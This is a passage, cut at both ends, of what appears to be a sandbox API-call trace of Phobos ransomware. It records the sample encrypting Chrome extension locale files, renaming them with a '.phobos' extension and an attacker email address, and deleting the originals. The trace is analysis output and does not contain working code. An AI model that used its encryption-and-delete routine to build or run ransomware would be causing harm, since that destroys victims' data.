data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.206] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.206] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.206] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.206] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0160.207] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.207] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xef, lpOverlapped=0x0) returned 1 [0160.207] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0160.207] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf0, lpOverlapped=0x0) returned 1 [0160.208] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0160.208] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.208] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0160.208] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.208] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0160.208] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.208] CloseHandle (hObject=0x134) returned 1 [0160.208] CloseHandle (hObject=0x130) returned 1 [0160.208] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\de\\messages.json")) returned 1 [0160.209] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0160.209] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.331] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=332) returned 1 [0160.331] CloseHandle (hObject=0x130) returned 1 [0160.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json")) returned 0x2020 [0160.331] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.331] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.331] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.332] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ce8) returned 1 [0160.332] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.332] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x14c, lpOverlapped=0x0) returned 1 [0160.332] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150, dwBufLen=0x150 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150) returned 1 [0160.332] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x150, lpOverlapped=0x0) returned 1 [0160.333] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0160.333] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.333] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0160.333] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.333] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0160.334] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.334] CloseHandle (hObject=0x130) returned 1 [0160.334] CloseHandle (hObject=0x134) returned 1 [0160.334] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\el\\messages.json")) returned 1 [0160.336] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0160.336] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.640] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=215) returned 1 [0160.640] CloseHandle (hObject=0x17c) returned 1 [0160.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json")) returned 0x2020 [0160.640] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.641] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.641] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.641] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.641] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0160.641] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.641] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xd7, lpOverlapped=0x0) returned 1 [0160.642] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0, dwBufLen=0xe0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xe0) returned 1 [0160.642] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xe0, lpOverlapped=0x0) returned 1 [0160.643] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0160.643] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.643] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0160.643] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.643] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0160.643] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.643] CloseHandle (hObject=0x17c) returned 1 [0160.643] CloseHandle (hObject=0x134) returned 1 [0160.643] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json")) returned 1 [0160.644] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0160.644] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.670] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=256) returned 1 [0160.670] CloseHandle (hObject=0x17c) returned 1 [0160.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json")) returned 0x2020 [0160.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.671] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.671] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.671] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.671] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0160.671] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.671] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x100, lpOverlapped=0x0) returned 1 [0160.672] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0160.672] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0160.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0160.708] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.708] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0160.708] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.708] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0160.709] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.709] CloseHandle (hObject=0x17c) returned 1 [0160.709] CloseHandle (hObject=0x194) returned 1 [0160.709] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json")) returned 1 [0160.711] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0160.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.727] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=234) returned 1 [0160.727] CloseHandle (hObject=0x194) returned 1 [0160.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json")) returned 0x2020 [0160.727] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0160.727] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.727] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0160.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.728] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0160.728] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0160.728] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xea, lpOverlapped=0x0) returned 1 [0160.729] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0, dwBufLen=0xf0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xf0) returned 1 [0160.729] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf0, 